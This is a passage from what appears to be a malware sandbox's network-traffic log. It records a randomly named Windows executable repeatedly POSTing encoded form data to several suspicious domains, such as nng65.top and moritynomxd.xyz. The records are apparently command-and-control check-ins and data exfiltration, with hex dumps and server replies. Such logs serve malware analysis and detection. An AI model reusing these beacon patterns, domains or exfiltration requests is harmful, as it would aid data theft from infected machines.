                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.animekuid.xyz
                                                                  Origin: http://www.animekuid.xyz
                                                                  Referer: http://www.animekuid.xyz/ztx6/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 47 63 79 33 43 36 45 38 69 37 34 30 36 34 53 64 61 31 4b 55 41 36 54 42 44 2b 48 30 70 72 36 63 50 37 30 65 73 4b 70 71 32 2b 36 39 59 72 51 76 4a 4c 4a 78 64 71 38 35 4a 48 58 37 75 50 6a 32 59 44 31 7a 61 62 39 4f 46 4e 46 2b 69 70 79 77 43 67 46 54 35 6a 77 5a 4c 52 6c 5a 77 4e 4d 42 2b 6a 4a 75 43 2b 67 64 34 68 37 45 41 55 6f 4c 37 37 4f 58 6b 67 57 2f 49 79 75 68 70 34 34 4c 79 6b 6e 79 32 4c 5a 56 50 43 53 57 4a 32 6d 42 4a 36 34 64 2f 68 33 41 62 7a 6d 76 70 77 36 31 61 34 4c 74 76 61 34 72 63 59 4b 4a 31 59 58 71 37 55 39 36 65 4f 76 45 47 2b 61 32 74 56 6d 4c 67 38 61 43 47 6b 49 5a 55 68 39 31 39 4d 54 55 48 77 4c 61 69 33 59 34 36 4e 64 79 33 50 32 2f 37 64 35 5a 73 46 4f 48 65 4f 30 49 57 6c 6a 77 5a 6e 6d 47 75 4d 44 58 62 4c 65 62 37 70 6c 42 51 7a 4e 41 4b 4e 59 70 6e 4c 4b 39 48 7a 43 52 47 47 73 68 6c 50 5a 64 4e 36 48 38 72 4c 6f 73 4c 51 38 42 58 46 31 51 78 46 31 42 68 75 53 6a 75 64 47 6c 73 62 59 78 46 35 46 74 39 70 6d 56 51 77 69 59 76 6d 53 69 77 6d 36 79 [TRUNCATED]
                                                                  Data Ascii: EZ2lo=Gcy3C6E8i74064Sda1KUA6TBD+H0pr6cP70esKpq2+69YrQvJLJxdq85JHX7uPj2YD1zab9OFNF+ipywCgFT5jwZLRlZwNMB+jJuC+gd4h7EAUoL77OXkgW/Iyuhp44Lykny2LZVPCSWJ2mBJ64d/h3Abzmvpw61a4Ltva4rcYKJ1YXq7U96eOvEG+a2tVmLg8aCGkIZUh919MTUHwLai3Y46Ndy3P2/7d5ZsFOHeO0IWljwZnmGuMDXbLeb7plBQzNAKNYpnLK9HzCRGGshlPZdN6H8rLosLQ8BXF1QxF1BhuSjudGlsbYxF5Ft9pmVQwiYvmSiwm6ylsOmJkDxwtFxGExNQ0LOS9Jc+28stDOxVf40m8oIOsds6z71QkOJMtdYq6mjV3Hb6JbOPw0Ltic2VgU4oggFxsl52dcxjhhQEZAx/R4mMYcJ9H79YIgHinsclriXOyVUXPVXZJE4ctqEwVkTiDgdW9D3R6BxjQnHPErZxHx7muEVnUxdHjs5456gy0PtIhOmPHELPqIhHyZWw0JiT4JSGBQ4QsYTxzpctYBCdxUYveG12G62LYkiTiJ7wRhC474K5x8ENWDCCZ4JTtZVYg1WV/P8GDEYQz10mAKQ7r1ZNHSxGK+rRabbFAyIggABwdlCKodRPIE4fs7K7kVZikcmU/rBISXNveDe3zjKWDdBbc8PdeF4Co8OKgc9uAwjqOViWshssJZC60fUJw32e4DJoOD6+O99eq75oaDPMLLwwK265DBTZ6WBB3ZNYafJNIBHUEB+kx2tg56s0y1b6iCRl+4D9Mdcg2jbkgnWk59R/v308oagMkKOGuyWZiB6Ar6YToJWmDrTcLILMadxL0YOyHdE5bMiapqiHX9Gk8MWwu6T2PUAlLJ9wl/aMwn+3rPZnUB7eUTslnNYlZu4yvc2zZQq/feD1OyAdNhfZ4eGNFVIkLzfvxMF/1RDwH+s+9AAIFzW+sTnpMC13wLxxYeSY2bfKRqQ+HhT2F [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  28192.168.2.1050004203.175.9.128806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:40:25.039671898 CEST516OUTGET /ztx6/?7NP=7FXXUPl&EZ2lo=LeaXBPgHi5cWzf7BLXmmPavQOKPWjuOHHJU4/JhL5/erYoJhFK0RVrM4N1v7oJ6CU0UsWYV2IqVksZKiICMv/g8AZCcinNpV5w5CDvgP9QHPdQNWgQ== HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.animekuid.xyz
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:40:26.444962978 CEST515INHTTP/1.1 301 Moved Permanently
                                                                  Date: Mon, 07 Oct 2024 08:40:25 GMT
                                                                  Server: Apache
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  X-Redirect-By: WordPress
                                                                  Upgrade: h2,h2c
                                                                  Connection: Upgrade, close
                                                                  Location: http://animekuid.xyz/ztx6/?7NP=7FXXUPl&EZ2lo=LeaXBPgHi5cWzf7BLXmmPavQOKPWjuOHHJU4/JhL5/erYoJhFK0RVrM4N1v7oJ6CU0UsWYV2IqVksZKiICMv/g8AZCcinNpV5w5CDvgP9QHPdQNWgQ==
                                                                  Vary: Accept-Encoding
                                                                  Transfer-Encoding: chunked
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Oct 7, 2024 10:40:26.456265926 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  29192.168.2.105000538.47.233.65806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:40:31.763179064 CEST770OUTPOST /kpvx/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.nng65.top
                                                                  Origin: http://www.nng65.top
                                                                  Referer: http://www.nng65.top/kpvx/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 6e 58 4e 34 74 31 41 6a 34 57 44 36 4a 62 31 61 65 47 7a 49 56 41 6d 49 75 71 49 52 77 56 54 30 46 41 32 66 65 68 70 6b 74 58 6e 6f 7a 48 68 4b 77 33 6c 6f 78 79 6c 54 48 6e 7a 6f 77 2f 66 77 52 74 49 4a 54 31 77 42 6b 71 42 4b 4b 34 38 62 36 72 44 4c 73 76 6f 72 79 4b 32 54 6a 55 2b 69 67 71 77 56 6c 72 46 65 67 47 68 68 33 70 55 59 77 4c 7a 6f 38 51 76 48 37 74 43 45 49 38 53 39 6c 4a 46 51 7a 75 38 2b 34 43 48 64 53 6d 54 65 74 37 65 79 36 52 74 51 55 4f 42 4f 63 41 45 39 59 53 6d 48 43 6c 50 61 6f 51 67 4d 63 73 37 30 52 32 73 65 34 67 74 43 57 65 7a 6d
                                                                  Data Ascii: EZ2lo=nXN4t1Aj4WD6Jb1aeGzIVAmIuqIRwVT0FA2fehpktXnozHhKw3loxylTHnzow/fwRtIJT1wBkqBKK48b6rDLsvoryK2TjU+igqwVlrFegGhh3pUYwLzo8QvH7tCEI8S9lJFQzu8+4CHdSmTet7ey6RtQUOBOcAE9YSmHClPaoQgMcs70R2se4gtCWezm
                                                                  Oct 7, 2024 10:40:32.606268883 CEST289INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 07 Oct 2024 08:40:32 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  30192.168.2.105000638.47.233.65806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:40:34.450180054 CEST794OUTPOST /kpvx/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.nng65.top
                                                                  Origin: http://www.nng65.top
                                                                  Referer: http://www.nng65.top/kpvx/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 6e 58 4e 34 74 31 41 6a 34 57 44 36 4a 36 46 61 4f 56 62 49 43 77 6d 50 79 36 49 52 36 31 54 34 46 41 71 66 65 6b 51 70 73 6c 7a 6f 7a 69 4e 4b 78 32 6c 6f 38 53 6c 54 4a 48 7a 74 2b 66 66 35 52 74 45 37 54 77 77 42 6b 71 46 4b 4b 35 4d 62 36 59 72 4b 74 2f 70 4e 30 4b 32 56 38 45 2b 69 67 71 77 56 6c 72 52 6e 67 47 35 68 33 36 63 59 69 35 58 33 78 77 76 41 73 64 43 45 65 38 53 35 6c 4a 45 46 7a 71 30 41 34 41 50 64 53 6d 44 65 74 71 65 78 67 42 74 73 61 75 41 46 64 68 31 56 51 58 53 47 4d 44 43 58 77 47 6b 5a 62 4e 61 7a 41 6e 4e 4a 72 58 78 4d 59 59 47 4d 38 42 52 73 4d 4d 43 35 71 50 4b 46 57 6d 43 52 50 33 6c 77 45 41 3d 3d
                                                                  Data Ascii: EZ2lo=nXN4t1Aj4WD6J6FaOVbICwmPy6IR61T4FAqfekQpslzoziNKx2lo8SlTJHzt+ff5RtE7TwwBkqFKK5Mb6YrKt/pN0K2V8E+igqwVlrRngG5h36cYi5X3xwvAsdCEe8S5lJEFzq0A4APdSmDetqexgBtsauAFdh1VQXSGMDCXwGkZbNazAnNJrXxMYYGM8BRsMMC5qPKFWmCRP3lwEA==
                                                                  Oct 7, 2024 10:40:35.344913006 CEST289INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 07 Oct 2024 08:40:35 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  31192.168.2.105000738.47.233.65806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:40:37.078308105 CEST1807OUTPOST /kpvx/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.nng65.top
                                                                  Origin: http://www.nng65.top
                                                                  Referer: http://www.nng65.top/kpvx/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 6e 58 4e 34 74 31 41 6a 34 57 44 36 4a 36 46 61 4f 56 62 49 43 77 6d 50 79 36 49 52 36 31 54 34 46 41 71 66 65 6b 51 70 73 6c 72 6f 7a 51 46 4b 77 52 78 6f 39 53 6c 54 58 58 7a 73 2b 66 65 35 52 70 67 2f 54 77 4d 37 6b 6f 4e 4b 49 66 59 62 38 70 72 4b 6e 2f 70 4e 35 71 32 51 6a 55 2b 7a 67 71 41 52 6c 72 42 6e 67 47 35 68 33 38 34 59 68 72 7a 33 33 77 76 48 37 74 44 57 49 38 53 52 6c 4a 4e 2b 7a 71 35 31 35 77 76 64 56 43 66 65 6f 59 32 78 72 42 74 55 5a 75 41 57 64 68 35 4b 51 54 4c 2f 4d 44 66 36 77 42 49 5a 65 71 76 49 46 6d 42 49 30 55 49 57 45 70 2b 77 75 33 5a 37 4c 73 44 74 6f 72 6d 62 56 46 61 46 48 7a 39 2f 62 4e 75 6a 32 56 42 78 6c 65 36 74 44 30 6d 77 62 39 4c 50 4b 69 44 39 76 62 48 32 6e 38 33 41 70 59 71 4d 66 32 77 6e 61 67 33 35 43 37 2f 5a 69 5a 36 32 75 35 46 68 6a 6f 61 68 57 4c 7a 6c 56 62 6a 46 50 44 71 4d 63 51 63 49 32 38 2b 4b 34 31 77 79 6e 71 73 61 62 2b 31 56 31 4b 75 44 6d 6b 42 45 47 4d 70 69 64 66 6a 4e 5a 2b 48 4c 65 2f 74 48 79 62 42 39 73 70 63 69 [TRUNCATED]
                                                                  Data Ascii: EZ2lo=nXN4t1Aj4WD6J6FaOVbICwmPy6IR61T4FAqfekQpslrozQFKwRxo9SlTXXzs+fe5Rpg/TwM7koNKIfYb8prKn/pN5q2QjU+zgqARlrBngG5h384Yhrz33wvH7tDWI8SRlJN+zq515wvdVCfeoY2xrBtUZuAWdh5KQTL/MDf6wBIZeqvIFmBI0UIWEp+wu3Z7LsDtormbVFaFHz9/bNuj2VBxle6tD0mwb9LPKiD9vbH2n83ApYqMf2wnag35C7/ZiZ62u5FhjoahWLzlVbjFPDqMcQcI28+K41wynqsab+1V1KuDmkBEGMpidfjNZ+HLe/tHybB9spciHaW4blBebFzbm040HsfHjjFgE/VkiUIqPl78AWUGy0tDU4ZXOQOKk046rPMBW2bZZtKczRHWrrPWk13ufBHfX1rpbIf/Q/q0CwmZ543GPV897IZWAvRCy2A/NGsuemUoE0OZ943tHUMopYpAhUl0dMlDduJum2T4ofnTQlW3z3+8R36fFxpzARBEPfgvuzUZUUN5MAWPb+cR0Qry8R+RXTV90I585xaYJg7v04DQhRXMvzfBF/BWgahk3MG5ZNLQ+g0AqC4OSkWIKq7twfxUM/5exYaa/xEbP7ZgfSA9L8Ds9Ja50SWi2Egy54F1C69bW49Z1q08yhWPq6ibnKmQ4SloQt5u5SBrkNN1u0BUDxaw4btjXPs+N5mFwQfDqPT+wl3OelAr7WSF2987A/KPy6kHlGyFAu6DBasyhImL1+dVTuxZ83jeQiNoJCsQFk3J0AxQud1VviYcmg2imndBB1NQa420KcKX+6VXzz27pwnn+T6y0tAD5SsVuVf9hxO1awVVo+QTO9OVmK0xZUX/b2GuRspBVPV91WkDCq4lgcEkehTyG0OW8sibmgmrXZsOyZ6XHOVRBaQT6ChDb24aOyArUhFzGzQeuuw9oOgR0dBv24wabxA2ibUcXQgthTQWDe8E422Lb+0RJ+VbK760sx1SyAevxlbhPD [TRUNCATED]
                                                                  Oct 7, 2024 10:40:37.913081884 CEST289INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 07 Oct 2024 08:40:37 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  32192.168.2.105000838.47.233.65806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:40:39.618515015 CEST512OUTGET /kpvx/?EZ2lo=qVlYuFMRm0T/H/1dN1vNUTygvewP5xPIMi2tCBBBqVz46ihG+FVn/BxKK2Kq0cGJXf1CUDwOjcd0Kop00bnWlMV60J7u8mOEgagA5oNjn1tN0dkAzg==&7NP=7FXXUPl HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.nng65.top
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:40:40.523669958 CEST289INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 07 Oct 2024 08:40:40 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  33192.168.2.1050009172.81.61.224806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:40:45.573451996 CEST788OUTPOST /vjif/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.moritynomxd.xyz
                                                                  Origin: http://www.moritynomxd.xyz
                                                                  Referer: http://www.moritynomxd.xyz/vjif/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 73 6a 46 61 63 6e 53 55 78 4c 32 42 55 34 52 4d 6b 52 2b 4c 47 4c 4f 6d 4d 4c 37 74 46 75 6c 75 39 65 6e 53 53 42 7a 48 74 67 4a 31 4e 32 51 75 4f 65 53 44 65 4d 69 45 7a 55 7a 73 78 51 37 44 67 61 51 72 42 39 7a 59 7a 47 31 4e 52 4b 47 75 69 76 50 54 35 6c 52 4a 49 53 41 34 4d 35 49 6a 2b 66 38 59 61 62 54 4f 6c 4e 2b 48 39 53 67 4c 70 50 35 4f 4a 35 7a 55 32 4e 39 39 6c 74 57 71 6a 32 37 41 69 67 54 77 7a 4e 33 2b 45 49 46 57 54 56 66 73 49 34 53 72 62 4d 55 71 5a 36 6a 63 49 53 48 64 2f 54 61 73 4f 33 30 33 2b 70 6e 72 6b 2f 74 6f 61 78 71 4a 41 55 58 30
                                                                  Data Ascii: EZ2lo=sjFacnSUxL2BU4RMkR+LGLOmML7tFulu9enSSBzHtgJ1N2QuOeSDeMiEzUzsxQ7DgaQrB9zYzG1NRKGuivPT5lRJISA4M5Ij+f8YabTOlN+H9SgLpP5OJ5zU2N99ltWqj27AigTwzN3+EIFWTVfsI4SrbMUqZ6jcISHd/TasO303+pnrk/toaxqJAUX0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  34192.168.2.1050010172.81.61.224806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:40:48.117775917 CEST812OUTPOST /vjif/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.moritynomxd.xyz
                                                                  Origin: http://www.moritynomxd.xyz
                                                                  Referer: http://www.moritynomxd.xyz/vjif/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 73 6a 46 61 63 6e 53 55 78 4c 32 42 46 72 4a 4d 33 67 2b 4c 54 37 4f 68 41 72 37 74 66 65 6c 69 39 66 62 53 53 41 32 4b 74 57 52 31 4d 54 73 75 4e 66 53 44 66 4d 69 45 34 30 7a 74 2b 77 37 32 67 61 4d 5a 42 2f 33 59 7a 47 78 4e 52 4f 43 75 69 63 33 51 35 31 52 4c 64 69 41 36 55 5a 49 6a 2b 66 38 59 61 62 58 6b 6c 4e 32 48 39 68 6f 4c 6f 72 6c 4e 41 5a 7a 56 68 39 39 39 68 74 57 75 6a 32 36 6e 69 6c 4c 4b 7a 49 72 2b 45 4d 4a 57 54 6e 33 74 48 34 53 74 56 73 56 6a 53 2f 2b 70 46 41 54 48 77 46 43 4d 55 77 45 52 39 49 47 73 31 75 4d 2f 4a 47 32 48 4f 53 69 65 57 53 69 6d 50 45 49 50 34 71 6a 71 47 66 42 42 6d 32 44 34 5a 51 3d 3d
                                                                  Data Ascii: EZ2lo=sjFacnSUxL2BFrJM3g+LT7OhAr7tfeli9fbSSA2KtWR1MTsuNfSDfMiE40zt+w72gaMZB/3YzGxNROCuic3Q51RLdiA6UZIj+f8YabXklN2H9hoLorlNAZzVh999htWuj26nilLKzIr+EMJWTn3tH4StVsVjS/+pFATHwFCMUwER9IGs1uM/JG2HOSieWSimPEIP4qjqGfBBm2D4ZQ==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  35192.168.2.1050011172.81.61.224806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:40:50.670505047 CEST1825OUTPOST /vjif/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.moritynomxd.xyz
                                                                  Origin: http://www.moritynomxd.xyz
                                                                  Referer: http://www.moritynomxd.xyz/vjif/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 73 6a 46 61 63 6e 53 55 78 4c 32 42 46 72 4a 4d 33 67 2b 4c 54 37 4f 68 41 72 37 74 66 65 6c 69 39 66 62 53 53 41 32 4b 74 57 70 31 4d 68 30 75 4b 4d 4b 44 63 4d 69 45 6b 6b 7a 6f 2b 77 37 76 67 61 46 51 42 2f 72 49 7a 45 35 4e 51 74 61 75 67 74 33 51 79 31 52 4c 43 79 41 37 4d 35 49 79 2b 63 45 63 61 62 48 6b 6c 4e 32 48 39 6d 59 4c 38 50 35 4e 47 5a 7a 55 32 4e 39 78 6c 74 57 53 6a 32 69 64 69 6c 2b 31 79 38 6e 2b 45 73 5a 57 52 79 72 74 4f 34 53 76 53 73 56 37 53 2f 36 41 46 41 50 74 77 46 66 68 55 32 30 52 74 35 76 6e 79 50 35 6d 58 55 6d 36 4d 44 6d 6e 46 79 2b 6c 4f 67 39 7a 76 4a 6e 2f 57 76 51 46 74 32 69 77 48 76 42 66 70 64 2b 58 68 6b 2f 4e 35 43 36 58 2b 39 49 55 42 6e 6a 54 71 79 31 38 4e 41 78 43 2f 75 2f 6d 54 5a 2b 67 56 37 48 6a 6c 48 5a 37 43 6d 31 65 64 61 33 4a 6b 66 30 49 72 56 58 50 72 54 68 52 34 54 6b 46 51 70 44 5a 71 62 59 49 73 47 59 52 43 42 47 55 36 58 5a 6b 48 39 4e 59 33 68 48 72 4a 62 6e 73 77 31 75 31 50 74 31 33 33 34 46 4d 4a 65 52 78 62 59 34 4d [TRUNCATED]
